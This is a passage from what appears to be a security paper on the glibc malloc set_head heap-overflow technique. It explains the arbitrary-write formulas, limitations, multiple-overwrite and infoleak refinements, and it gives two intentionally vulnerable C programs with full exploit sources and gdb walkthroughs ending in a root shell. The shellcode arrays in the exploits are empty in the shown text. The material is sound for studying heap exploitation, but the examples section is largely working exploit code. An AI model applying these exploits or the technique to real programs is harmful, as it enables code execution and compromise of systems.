30       check_malloced_chunk(av, victim, nb);
31       return chunk2mem(victim);
32     }

All the magic happens at line 28.  By forcing a particular context inside
the application, it's possible to control set_head's parameters and then
overwrite almost any memory address with almost four arbitrary bytes.

Let's see how it's possible to control these two parameters, which are
'remainder' and 'remainder_size' :

        1. How to get control of 'remainder_size':

           a. At line 13, 'nb' is filled with the normalized size of the
              value of the malloc call.  The attacker should have control
              on the value of this malloc call.

           b. Remember that this technique requires that the size field of
              the top chunk needs to be overwritten by the overflow.  At
              line 19 & 20, the value of the overwritten size field of the
              top chunk is getting loaded in 'size'.

           c. At line 22, a check is done to ensure that the top chunk is
              large enough to take care of the malloc request.  The
              attacker needs this condition to evaluate to true to reach
              the set_head() macro at line 28.

           d. At line 23, the requested size of the malloc call is
              subtracted from the size of the top chunk.  The remaining
              value is then stored in 'remainder_size'.

        2. How to get control of 'remainder':

           a. At line 13, 'nb' is filled with the normalized size of the
              value of the malloc call.  The attacker should have control
              of the value of this malloc call.

           b. Then, at line 19, the variable 'victim' gets filled with the
              address of the top chunk.

           c. After this, at line 24, chunk_at_offset() is called.  This
              macro adds the content of 'nb' to the value of 'victim'.  The
              result will be stored in 'remainder'.

Finally, at line 28, the set_head() macro modifies the size field of the
fake remainder chunk and fills it with the content of the variable
'remainder_size'.  This is how you get your "write almost 4 arbitrary bytes
to almost anywhere in memory" primitive.

--[ 3 - Automation

It was explained in section 2.3 that the variables 'remainder' and
'remainder_size' will be used as parameters to the set_head macro.  The
following steps will explain how to proceed in order to get the desired
value in those two variables.

----[ 3.1 - Define the basic properties

Before trying to exploit a security hole with the set_head technique, the
attacker needs to define the parameters of the vulnerable context.  These
parameters are:

        1. The return location:  This is the location in memory that you
           want to write to.  It is often referred to as 'retloc'
           throughout this paper.

        2. The return address: This is the content that you will write to
           your return location.  Normally, this will be a memory address
           that points to your shellcode.  It is often referred to as
           'retadr' throughout this paper.

        3. The location of the topchunk: To use this technique, you must
           know the exact position of the top chunk in memory.  This
           location is often referred to as 'toploc' throughout this paper.

----[ 3.2 - Extract the formulas

The attacker has control on two things during the exploitation stage.
First, the content of the overwritten top chunk's size field and secondly,
the size parameter to the malloc call.  The values that the attacker
chooses for these will determine the exact content of the variables
'remainder' and 'remainder_size' later used by the set_head() macro.

Below, two formulas are presented to help the attacker find the appropriate
values:

        1. How to get the value for the malloc parameter:

           a. The following line is taken directly from the malloc.c code:

              remainder = chunk_at_offset(victim, nb)

           b. 'nb' is the normalized value of the malloc call.  It's the
              result of the macro request2size().  To make things simpler,
              let's add 8 to this value to take care of this macro:

              remainder = chunk_at_offset(victim, nb + 8)

           c. chunk_at_offset() adds the normalized size 'nb' to the top
              chunk's location:

              remainder = toploc + (nb + 8)

            d. 'remainder' is the return location (i.e. 'retloc') and 'nb'
               is the malloc size (i.e. 'malloc_size'):

               retloc = toploc + (malloc_size + 8)

            e. Isolate the 'malloc_size' variable to get the final formula:

               malloc_size = (retloc - toploc - 8)

        2. The second formula is how to get the new size of the top chunk.

           a. The following line is taken directly from the malloc.c code:

              remainder_size = size - nb;

           b. 'size' is the size of the top chunk (i.e. 'topchunk_size'),
              and 'nb' is the normalized parameter of the malloc call
              (i.e. 'malloc_size'):

              remainder_size = topchunk_size - malloc_size

            c. 'remainder_size' is in fact the return address
               (i.e. 'retadr'):

              retadr = topchunk_size - malloc_size

           d. Isolate 'topchunk_size' to get the final formula:

              topchunk_size = retadr + malloc_size

           e. topchunk_size will get its three least significant bits
              cleared by the macro chunksize().  Let's consider this in the
              formula by adding 8 to the right side of the equation:

              topchunk_size = (retadr + malloc_size + 8)

            f. Take into consideration that the PREV_INUSE flag is being set
              in the set_head() macro:

              topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE

----[ 3.3 - Compute the values

You now have the two basic formulas:

        1. malloc_size = (retloc - toploc - 8)

        2. topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE

You can now proceed with finding the exact values that you will plug into
your exploit.

To facilitate the integration of those formulas in your exploit code, you
can use the set_head_compute() function found in the file(1) utility
exploit code (refer to section 6.2.3).  Here is the prototype of the
function:

        struct sethead * set_head_compute
            (unsigned int retloc, unsigned int retadr, unsigned int toploc)

The structure returned by the function set_head_compute() is defined this
way:

        struct sethead {
            unsigned long topchunk_size;
            unsigned long malloc_size;
        };

By giving this function your return location, your return address and your
top chunk location, it will compute the exact malloc size and top chunk
size to use in your exploit.  It will also tell you if it's possible to
execute the requested write operation based on the return address and the
return location you have chosen.

--[ 4 - Limitations

At the time of writing this paper, there was no simple and easy way to
exploit a heap overflow when the top chunk is involved.  Each exploitation
technique needs a particular context to work successfully.  The set_head
technique is no different.  It has some requirements to work properly.

Also, it's not a real "write 4 arbitrary bytes to anywhere" primitive.  In
fact, it would be more of a "write almost 4 arbitrary bytes to almost
anywhere in memory" primitive.

----[ 4.1 - Requirements of two different techniques

Specific elements need to be present to exploit a situation in which the
wilderness chunk is involved.  These elements tend to impose a lot of
constraints when trying to exploit a program.  Below, the requirements for
the set_head technique are listed, alongside those of the "House of Force"
technique. As you will see, each technique has its pros and cons.

------[ 4.1.1 - The set_head() technique

Minimum requirements:

        1. The size field of the topchunk needs to be overwritten with a
           value that the attacker can control;

        2. Then, there is a call to malloc with a parameter that the
           attacker can control;

This technique will let you write almost 4 arbitrary bytes to almost
anywhere in memory.

------[ 4.1.2 The "House of Force" technique

Minimum requirements:

        1. The size field of the topchunk must be overwritten with a very
           large value;

        2. Then, there must be a first call to malloc with a very large
           size.  An important point is that this same allocated buffer
           should only be freed after the third step.

        3. Finally, there should be a second call to malloc.  This buffer
           should then be filled with some user supplied data.

This technique will, in the best-case scenario, let you overwrite any
region in memory with a string of an arbitrary length that you control.

----[ 4.2 - Almost 4 bytes to almost anywhere technique

This set_head technique is not really a "write 4 arbitrary bytes anywhere
in memory" primitive.  There are some restrictions in malloc.c that greatly
limit the possible values an attacker can use for the return location and
the return address in an exploit.  Still, it's possible to run arbitrary
code if you carefully choose your values.

Below you will find the three main restrictions of this technique:

------[ 4.2.1 - Everything in life is a multiple of 8

A disadvantage of the set_head technique is the presence of macros that
ensure memory locations and values are multiples of 8 bytes.  These macros
are:

    - checked_request2size() and
    - chunksize()

Ultimately, this will have some influence on the selection of the return
location and the return address.

The memory addresses that you can overwrite with the set_head technique
need to be aligned on an 8-byte boundary.  Interesting locations to
overwrite on the stack usually include a saved EIP of a stack frame or a
function pointer.  These pointers are aligned on a 4-byte boundary, so with
this technique, you will only be able to modify every other one of them.

The return address will also need to be a multiple of 8 (not counting the
logical OR with PREV_INUSE).  Normally, the attacker has the possibility of
providing a NOP cushion right before his shellcode, so this is not really a
big issue.

------[ 4.2.2 - Top chunk's size needs to be bigger than the requested
                malloc size

This is the main disadvantage of the set_head technique.  For the top chunk
code to be triggered and serve the memory request, there is a verification
before the top chunk code is executed:

        --[ From malloc.c

        if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {

In short, this line requires that the size of the top chunk be at least
the requested size plus MINSIZE.  Since the variables 'size' and 'nb'
are computed from the return location, the return address and the top
chunk's location, it will greatly limit the content and the location of the
arbitrary overwrite operation.  There is still a valid combination of a
return address and a return location that exists.

Let's see what the value of 'size' and 'nb' for a given return location and
return address will be.  Let's find out when there is a situation in which
'size' is greater than 'nb'.  Consider the fact that the location of the
top chunk is static and it's at 0x080614f8:

        |   return   |   return   ||    size    |     nb     |
        |  location  |   address  ||            |            |
        | 0x0804b150 | 0x08061000 ||  134523993 | 4294876240 |
        | 0x0804b150 | 0xbffffbaa || 3221133059 | 4294876240 |
        | 0xbffffaaa | 0xbffffbaa || 2012864861 | 3086607786 |
        | 0xbffffaaa | 0x08061000 || 3221222835 | 3086607786 | <- !!!!!

As you can see from this chart, the only time that you get a situation
where 'size' is greater than 'nb' is when your return location is somewhere
in the stack and when your return address is somewhere in the heap.

------[ 4.2.3 - Logical OR with PREV_INUSE

When the set_head macro is called, 'remainder_size', which is the return
address, will be altered by a logical OR with the flag PREV_INUSE:

        --[ From malloc.c

        #define PREV_INUSE 0x1

        set_head(remainder, remainder_size | PREV_INUSE);

It was said in section 4.2.1 that the return address will always be a
multiple of 8 bytes due to the rounding done by some macros.  With the
PREV_INUSE logical OR, it will be a multiple of 8 bytes, plus 1.  With a
NOP cushion, this problem is solved.  Compared to the previous two, this
restriction is a very small one.

--[ 5 - Taking set_head() to the next level

As a general rule, hackers try to make their exploit as reliable as
possible.  Exploiting a vulnerability in a confined lab and in the wild are
two different things.  This section will try to present some techniques to
improve the reliability of the set_head technique.

----[ 5.1 - Multiple overwrites

One way to make the exploitation process a lot more reliable is by using
multiple overwrites.  Indeed, having the possibility of overwriting a
memory location with 4 bytes is good, but the ability to write to memory
multiple times is even better[8].  Being able to overwrite multiple memory
locations with set_head will increase your chance of finding a valid return
location on the stack.

A great advantage of the set_head technique is that it does not corrupt
internal malloc information in a way that prevents the program from working
properly.  This advantage will let you safely overwrite more than one
memory location.

To correctly put this technique in place, the attacker will need to start
overwriting addresses at the top of the stack, and go downward until he
seizes control of the program.  Here are the possible addresses that
set_head() lets you overwrite on the stack:

        1: 0xbffffffc
        2: 0xbffffff4
        3: 0xbfffffec
        4: 0xbfffffe4
        5: 0xbfffffdc
        6: 0xbfffffd4
        7: 0xbfffffcc
        8: 0xbfffffc4
        9: ...

Eventually, the attacker will fall on a memory location which is a saved
EIP in a stack frame.  If he's lucky enough, this new saved EIP will be
popped in the EIP register.

Remember that for a successful overwrite, the attacker needs to do two
things:

        1. Overwrite the top chunk with a specific value;
        2. Make a call to malloc with a specific value.

Based on the formulas that were found in section 3.3, let's compute the
values for the top chunk size and the size for the malloc call for each
overwrite operation.  Let's take the following values for an example case:

        The location of the top chunk:        0x08050100
        The return address:                   0x08050200
        The return location:                  Decrementing from 0xbffffffc
                                              to 0xbfffffc4

         |   return   || top chunk  |   malloc   |
         |  location  ||   size     |    size    |
         | 0xbffffffc || 3221225725 | 3086679796 |
         | 0xbffffff4 || 3221225717 | 3086679788 |
         | 0xbfffffec || 3221225709 | 3086679780 |
         | 0xbfffffe4 || 3221225701 | 3086679772 |
         | 0xbfffffdc || 3221225693 | 3086679764 |
         | 0xbfffffd4 || 3221225685 | 3086679756 |
         | 0xbfffffcc || 3221225677 | 3086679748 |
         | 0xbfffffc4 || 3221225669 | 3086679740 |
         |     ...    ||     ...    |     ...    |

By looking at this chart, you can determine that for each overwrite
operation, the attacker would need to overwrite the size of the top chunk
with a new value and make a call to malloc with a specific value.  Would
it be possible to improve this a little bit?  It would be great if the only
thing you needed to change between each overwrite operation was the size of
the malloc call, leaving the size of the top chunk untouched.

Indeed, it's possible.  Look closely at the formulas used to compute
malloc_size and topchunk_size.  Let's say the attacker has only one
possibility to overwrite the size of the top chunk, would it still be
possible to do multiple overwrites using the set_head technique while
keeping the same size for the top chunk?

        1. malloc_size = (retloc - toploc - 8)
        2. topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE

If you look at how 'topchunk_size' is computed, it seems possible.
Changing the value of 'retloc' will affect 'malloc_size'.  Then,
'malloc_size' is used to compute 'topchunk_size'.  By playing with 'retadr'
in the second formula, you can always hit the same 'topchunk_size'.  Let's
look at the same example, but this time with a changing return address.
While the return location is decrementing by 8, let's increment the return
address by 8.

        |   return   |  return   || top chunk  |   malloc   |
        |  location  |  address  ||   size     |    size    |
        | 0xbffffffc | 0x8050200 || 3221225725 | 3086679796 |
        | 0xbffffff4 | 0x8050208 || 3221225725 | 3086679788 |
        | 0xbfffffec | 0x8050210 || 3221225725 | 3086679780 |
        | 0xbfffffe4 | 0x8050218 || 3221225725 | 3086679772 |
        | 0xbfffffdc | 0x8050220 || 3221225725 | 3086679764 |
        | 0xbfffffd4 | 0x8050228 || 3221225725 | 3086679756 |
        | 0xbfffffcc | 0x8050230 || 3221225725 | 3086679748 |
        | 0xbfffffc4 | 0x8050238 || 3221225725 | 3086679740 |
        |    ...     |    ...    ||     ...    |     ...    |

You can see that the size of the top chunk is always the same.  On the
other hand, the return address changes through the multiple overwrites.
The attacker needs a NOP cushion big enough to absorb this changing
return address.

Refer to the examples section below for a sample vulnerable scenario
exploitable with multiple overwrites.

----[ 5.2 - Infoleak

As was stated in the Shellcoder's Handbook[9]: "An information leak can
make even a difficult bug possible".  Most of the time, people who write
exploits try to make them as reliable as possible.  If hackers, using an
infoleak technique, can improve the reliability of the set_head technique,
well, that's pretty good.  The technique is already hard to use because it
relies on unknown memory locations, which are:

        - The return location
        - The top chunk location
        - The return address

When there is an overwrite operation, if the attacker is able to tell if
the program has crashed or not, he can turn this to his advantage.  Indeed,
this knowledge could help him find one parameter of the exploitable
situation, which is the top chunk location.

The theory behind this technique is simple.  If the attacker knows the
real address of the top chunk, he will be able to write at the address
0xbffffffc but not at the address 0xc0000004.

Indeed, a write operation at the address 0xbffffffc will work because this
address is in the stack and its purpose is to store the environment
variables of the program.  It does not significantly affect the behaviour
of the program, so the program will still continue to run normally.

On the other hand, if the attacker wrote in memory starting from
0xc0000000, there will be a segmentation fault because this memory region
is not mapped.  After this violation, the program will crash.

To take advantage of this behaviour, the attacker will have to do a series
of write operations while incrementing or decrementing the location of the
top chunk.  For each top chunk location tried, there should be 6 write
operations.

Below, you will find the parameters of the exploitable situation to use
during the 6 write operations.  The expected result is in the right column
of the chart.  If you get these results, then the value used for the
location of the top chunk is the right one.

        |  return    |   return   ||    Did it    |
        |  location  |   address  ||   segfault ? |
        | 0xc0000014 | 0x07070707 ||     Yes      |
        | 0xc000000c | 0x07070707 ||     Yes      |
        | 0xc0000004 | 0x07070707 ||     Yes      |
        | 0xbffffffc | 0x07070707 ||     No       |
        | 0xbffffff4 | 0x07070707 ||     No       |
        | 0xbfffffec | 0x07070707 ||     No       |

If the 6 write operations made the program segfault each time, then the
attacker is probably writing after 0xbfffffff or below the limit of the
stack.

If the 6 write operations succeeded and the program did not crash, then it
probably means that the attacker overwrote some values in the stack.  In
that case, decrement the value of the top chunk location to use.

--[ 6 - Examples

The best way to learn something new is probably with the help of examples.
Below, you will find some vulnerable programs and their exploits.

A scenario-based approach is taken here to demonstrate the exploitability
of a situation.  Ultimately, the exploitability of a context can be defined
by specific characteristics.

Also, the application of the set_head() technique on a real life example is
shown with the file(1) utility vulnerability.  The set_head technique was
originally developed to exploit this specific vulnerability.

----[ 6.1 - The basic scenarios

To simplify things, it's useful to define exploitable contexts in terms of
scenarios.  For each specific scenario, there should be a specific way to
exploit it.  Once the reader has learned those scenarios, he can then match
them with vulnerable situations in software.  He will then know exactly
what approach to use to make the most out of the vulnerability.

------[ 6.1.1 - The most basic form of the set_head() technique

This scenario is the most basic form of the application of the set_head()
technique.  This is the approach that was used in the file(1) utility
exploit.
--------------------------- scenario1.c -----------------------------------
        #include <stdio.h>
        #include <stdlib.h>

        int main (int argc, char *argv[]) {

                char *buffer1;
                char *buffer2;
                unsigned long size;

/* [1] */       buffer1 = (char *) malloc (1024);
/* [2] */       sprintf (buffer1, argv[1]);

                size = strtoul (argv[2], NULL, 10);

/* [3] */       buffer2 = (char *) malloc (size);

                return 0;
        }
--------------------------- end of scenario1.c ----------------------------

Here is a brief description of the important lines in this code:

[1]: The top chunk is split and a memory region of 1024 bytes is requested.

[2]: A sprintf call is made.  The destination buffer is not checked to see
     if it is large enough.  The top chunk can then be overwritten here.

[3]: A call to malloc with a user-supplied size is done.

------[ 6.1.2 - Exploit

--------------------------- exp1.c ----------------------------------------
   Exploit for scenario1.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// The following #define are from malloc.c and are used
// to compute the values for the malloc size and the top chunk size.
#define PREV_INUSE 0x1
#define SIZE_SZ (sizeof(size_t))
#define MIN_CHUNK_SIZE 16
#define MALLOC_ALIGNMENT (2 * SIZE_SZ)
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
#define IS_MMAPPED 0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS (PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA)
#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
    & ~MALLOC_ALIGN_MASK))
#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \
    < MINSIZE) ? MINSIZE : \
    (((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))

struct sethead {
    unsigned long topchunk_size;
    unsigned long malloc_size;
};

/* linux_ia32_exec -  CMD=/bin/sh Size=68 Encoder=PexFnstenvSub */
unsigned char scode[] =

struct sethead * set_head_compute
    (unsigned long retloc, unsigned long retadr, unsigned long toploc) {

    unsigned long check_retloc, check_retadr;
    struct sethead *shead;

    shead = (struct sethead *) malloc (8);
    if (shead == NULL) {
        fprintf (stderr,
            "--[ Could not allocate memory for sethead structure\n");
        exit (1);
    }

    if ( (toploc % 8) != 0 ) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the top chunk location.",
            toploc);

        toploc = toploc - (toploc % 8);
        fprintf (stderr, "  Using 0x%x instead\n", toploc);
    } else
        fprintf (stderr,
            "--[ Using 0x%x as the top chunk location.\n", toploc);

    // The minus 8 is to take care of the normalization
    // of the malloc parameter
    shead->malloc_size = (retloc - toploc - 8);

    // By adding the 8, we are able to sometimes perfectly hit
    // the return address.  To hit it perfectly, retadr must be a multiple
    // of 8 + 1 (for the PREV_INUSE flag).
    shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE;

    if (shead->topchunk_size < shead->malloc_size) {
        fprintf (stderr,
            "--[ ERROR: topchunk size is less than malloc size.\n");
        fprintf (stderr, "--[ Topchunk code will not be triggered\n");
        exit (1);
    }

    check_retloc = (toploc + request2size (shead->malloc_size) + 4);
    if (check_retloc != retloc) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return location. ", retloc);
        fprintf (stderr, "Using 0x%x instead\n", check_retloc);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return location.\n",
            retloc);

    check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
        - request2size (shead->malloc_size)) | PREV_INUSE;
    if (check_retadr != retadr) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return address.", retadr);
        fprintf (stderr, " Using 0x%x instead\n", check_retadr);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return address.\n",
            retadr);

    return shead;
}

void put_byte (char *ptr, unsigned char data) {
    *ptr = data;
}

void put_longword (char *ptr, unsigned long data) {
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
    put_byte (ptr + 2, data >> 16);
    put_byte (ptr + 3, data >> 24);
}

int main (int argc, char *argv[]) {

        char *buffer;
        char malloc_size_string[20];
        unsigned long retloc, retadr, toploc;
        unsigned long topchunk_size, malloc_size;
        struct sethead *shead;

        if ( argc != 4) {
                printf ("wrong number of arguments, exiting...\n\n");
                printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
                return 1;
        }

        sscanf (argv[1], "0x%x", &retloc);
        sscanf (argv[2], "0x%x", &retadr);
        sscanf (argv[3], "0x%x", &toploc);

        shead = set_head_compute (retloc, retadr, toploc);
        topchunk_size = shead->topchunk_size;
        malloc_size = shead->malloc_size;

        buffer = (char *) malloc (1036);

        memset (buffer, 0x90, 1036);
        put_longword (buffer+1028, topchunk_size);
        memcpy (buffer+1028-strlen(scode), scode, strlen (scode));

        snprintf (malloc_size_string, 20, "%u", malloc_size);
        execl ("./scenario1", "scenario1", buffer, malloc_size_string,
            NULL);

        return 0;
}
--------------------------- end of exp1.c ---------------------------------

Here are the steps to find the 3 memory values to use for this exploit.

1- The first step is to generate a core dump file from the vulnerable
program.  You will then have to analyze this core dump to find the proper
values for your exploit.

To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section.  Normally, the heap will
start just after the BSS section:

bash$ readelf -S ./scenario1 | grep bss
  [22] .bss              NOBITS          080495e4 0005e4 000004

The BSS section starts at 0x080495e4.  Let's call the exploit the following
way, and remember to replace 0x080495e4 with the BSS value you have found:

bash$ ./exp1 0xc0c0c0c0 0x080495e4 0x080495e4
--[ Impossible to use 0x80495e4 as the top chunk location.  Using 0x80495e0
--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
--[ Impossible to use 0x80495e4 as the return address. Using 0x80495e1
Segmentation fault (core dumped)

2- Call gdb on that core dump file.

bash$ gdb -q scenario1 core.2212
Core was generated by `scenario1'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/debug/
Loaded symbols for /usr/lib/debug/
Reading symbols from /lib/
Loaded symbols for /lib/
#0  _int_malloc (av=0x40140860, bytes=1075054688) at malloc.c:4082

4082          set_head(remainder, remainder_size | PREV_INUSE);

3- The ESI register contains the address of the top chunk.  It might be
another register for you.

(gdb) info reg esi
esi            0x8049a38        134519352

4- Start searching before the location of the top chunk to find the NOP
cushion.  This will be the return address.

0x8049970:      0x90909090      0x90909090      0x90909090      0x90909090
0x8049980:      0x90909090      0x90909090      0x90909090      0x90909090
0x8049990:      0x90909090      0x90909090      0x90909090      0x90909090
0x80499a0:      0x90909090      0x90909090      0x90909090      0x90909090
0x80499b0:      0x90909090      0x90909090      0x90909090      0x90909090
0x80499c0:      0x90909090      0x90909090      0x90909090      0x90909090
0x80499d0:      0x90909090      0x90909090      0x90909090      0x90909090
0x80499e0:      0x90909090      0x90909090      0x90909090      0xe983c931
0x80499f0:      0xd9eed9f5      0x5bf42474      0x27137381      0x83b3c0e2
0x8049a00:      0xf4e2fceb      0x2a98e94d      0x9ea88475      0xdb276b44

0x8049990 is a valid address.

5- To get the return location for your exploit, get a saved EIP from a
stack frame.

(gdb) frame 2
#2  0x0804840a in main ()
(gdb) x $ebp+4
0xbffff52c:     0x4002980c

0xbffff52c is the return location.

6- You can now call the exploit with the values that you have found.

bash$ ./exp1 0xbffff52c 0x8049990 0x8049a38
--[ Using 0x8049a38 as the top chunk location.
--[ Using 0xbffff52c as the return location.
--[ Impossible to use 0x8049990 as the return address. Using 0x8049991
sh-2.05b# exit

------[ 6.1.3 - Multiple overwrites

This scenario is an example of a situation where it could be possible to
leverage the set_head() technique to make it write multiple times in
memory.  Applying this technique will help you improve the reliability of
the exploit.  It will increase your chances of finding a valid return
location while you are exploiting the program.

--------------------------- scenario2.c -----------------------------------
        #include <stdio.h>
        #include <stdlib.h>
        #include <unistd.h>

        int main (int argc, char *argv[]) {

                char *buffer1;
                char *buffer2;
                unsigned long size;

/* [1] */       buffer1 = (char *) malloc (4096);
/* [2] */       fgets (buffer1, 4200, stdin);

/* [3] */       do {
                        size = 0;
                        scanf ("%u", &size);
/* [4] */               buffer2 = (char *) malloc (size);

                        /*
                         * Random code
                         */

/* [5] */               free (buffer2);

                } while (size != 0);

                return 0;
        }
------------------------- end of scenario2.c ------------------------------

Here is a brief description of the important lines in this code:

[1]: A memory region of 4096 bytes is requested.  The top chunk is split
     and the request is serviced.

[2]: A call to fgets is made.  The destination buffer is not checked to see
     if it is large enough.  The top chunk can then be overwritten here.

[3]: The program enters a loop.  It reads from 'stdin' until the number '0'
     is entered.

[4]: A call to malloc is done with 'size' as the parameter.  The loop does
     not end until size equals '0'.  This gives the attacker the
     possibility of overwriting the memory multiple times.

[5]: The buffer needs to be freed at the end of the loop.

------[ 6.1.4 - Exploit

--------------------------- exp2.c ----------------------------------------
   Exploit for scenario2.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// The following #define are from malloc.c and are used
// to compute the values for the malloc size and the top chunk size.
#define PREV_INUSE 0x1
#define SIZE_SZ (sizeof(size_t))
#define MIN_CHUNK_SIZE 16
#define MALLOC_ALIGNMENT (2 * SIZE_SZ)
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
#define IS_MMAPPED 0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS (PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA)
#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
    & ~MALLOC_ALIGN_MASK))
#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \
    < MINSIZE) ? MINSIZE : \
    (((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))

struct sethead {
    unsigned long topchunk_size;
    unsigned long malloc_size;
};

/* linux_ia32_exec -  CMD=/bin/id Size=68 Encoder=PexFnstenvSub */
unsigned char scode[] =

struct sethead * set_head_compute
    (unsigned long retloc, unsigned long retadr, unsigned long toploc) {

    unsigned long check_retloc, check_retadr;
    struct sethead *shead;

    shead = (struct sethead *) malloc (8);
    if (shead == NULL) {
        fprintf (stderr,
            "--[ Could not allocate memory for sethead structure\n");
        exit (1);
    }

    if ( (toploc % 8) != 0 ) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the top chunk location.",
            toploc);

        toploc = toploc - (toploc % 8);
        fprintf (stderr, "  Using 0x%x instead\n", toploc);
    } else
        fprintf (stderr,
            "--[ Using 0x%x as the top chunk location.\n", toploc);

    // The minus 8 is to take care of the normalization
    // of the malloc parameter
    shead->malloc_size = (retloc - toploc - 8);

    // By adding the 8, we are able to sometimes perfectly hit
    // the return address.  To hit it perfectly, retadr must be a multiple
    // of 8 + 1 (for the PREV_INUSE flag).
    shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE;

    if (shead->topchunk_size < shead->malloc_size) {
        fprintf (stderr,
            "--[ ERROR: topchunk size is less than malloc size.\n");
        fprintf (stderr, "--[ Topchunk code will not be triggered\n");
        exit (1);
    }

    check_retloc = (toploc + request2size (shead->malloc_size) + 4);
    if (check_retloc != retloc) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return location. ", retloc);
        fprintf (stderr, "Using 0x%x instead\n", check_retloc);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return location.\n",
            retloc);

    check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
        - request2size (shead->malloc_size)) | PREV_INUSE;
    if (check_retadr != retadr) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return address.", retadr);
        fprintf (stderr, " Using 0x%x instead\n", check_retadr);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return address.\n",
            retadr);

    return shead;
}

void put_byte (char *ptr, unsigned char data) {
    *ptr = data;
}

void put_longword (char *ptr, unsigned long data) {
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
    put_byte (ptr + 2, data >> 16);
    put_byte (ptr + 3, data >> 24);
}

int main (int argc, char *argv[]) {

        char *buffer;
        char malloc_size_buffer[20];
        unsigned long retloc, retadr, toploc;
        unsigned long topchunk_size, malloc_size;
        struct sethead *shead;
        int i;

        if ( argc != 4) {
                printf ("wrong number of arguments, exiting...\n\n");
                printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
                return 1;
        }

        sscanf (argv[1], "0x%x", &retloc);
        sscanf (argv[2], "0x%x", &retadr);
        sscanf (argv[3], "0x%x", &toploc);

        shead = set_head_compute (retloc, retadr, toploc);
        topchunk_size = shead->topchunk_size;
        free (shead);

        buffer = (char *) malloc (4108);
        memset (buffer, 0x90, 4108);
        put_longword (buffer+4100, topchunk_size);
        memcpy (buffer+4100-strlen(scode), scode, strlen (scode));

        printf ("%s\n", buffer);

        for (i = 0; i < 300; i++) {
                shead = set_head_compute (retloc, retadr, toploc);
                topchunk_size = shead->topchunk_size;
                malloc_size = shead->malloc_size;

                printf ("%u\n", malloc_size);

                retloc = retloc - 8;
                retadr = retadr + 8;

                free (shead);
        }

        return 0;
}
--------------------------- end of exp2.c ---------------------------------

Here are the steps to find the memory values to use for this exploit.

1- The first step is to generate a core dump file from the vulnerable
program.  You will then have to analyze this core dump to find the proper
values for your exploit.

To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section.  Normally, the heap will
start just after the BSS section:

bash$ readelf -S ./scenario2|grep bss
  [22] .bss              NOBITS          0804964c 00064c 000008

The BSS section starts at 0x0804964c.  Let's call the exploit the following
way, and remember to replace 0x0804964c with the BSS value you have found:

bash$ ./exp2 0xc0c0c0c0 0x0804964c 0x0804964c | ./scenario2
--[ Impossible to use 0x804964c as the top chunk location.  Using 0x8049648
--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
--[ Impossible to use 0x804964c as the return address. Using 0x8049649
--[ Impossible to use 0x804964c as the top chunk location.  Using 0x8049648
--[ Impossible to use 0xc0c0b768 as the return location. Using 0xc0c0b76c
--[ Impossible to use 0x8049fa4 as the return address. Using 0x8049fa1
Segmentation fault (core dumped)

2- Call gdb on that core dump file.

bash$ gdb -q scenario2 core.2698
Core was generated by `./scenario2'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/debug/
Loaded symbols for /usr/lib/debug/
Reading symbols from /lib/
Loaded symbols for /lib/
#0  _int_malloc (av=0x40140860, bytes=1075054688) at malloc.c:4082

4082          set_head(remainder, remainder_size | PREV_INUSE);

3- The ESI register contains the address of the top chunk.  It might be
another register for you.

(gdb) info reg esi
esi            0x804a6a8        134522536

4- For the return address, get a memory address at the beginning of the NOP
cushion.

0x8049654:      0x00000000      0x00000000      0x00000019      0x4013e698
0x8049664:      0x4013e698      0x400898a0      0x4013d720      0x00000000
0x8049674:      0x00000019      0x4013e6a0      0x4013e6a0      0x400899b0
0x8049684:      0x4013d720      0x00000000      0x00000019      0x4013e6a8
0x8049694:      0x4013e6a8      0x40089a80      0x4013d720      0x00000000
0x80496a4:      0x00001009      0x90909090      0x90909090      0x90909090
0x80496b4:      0x90909090      0x90909090      0x90909090      0x90909090
0x80496c4:      0x90909090      0x90909090      0x90909090      0x90909090
0x80496d4:      0x90909090      0x90909090      0x90909090      0x90909090

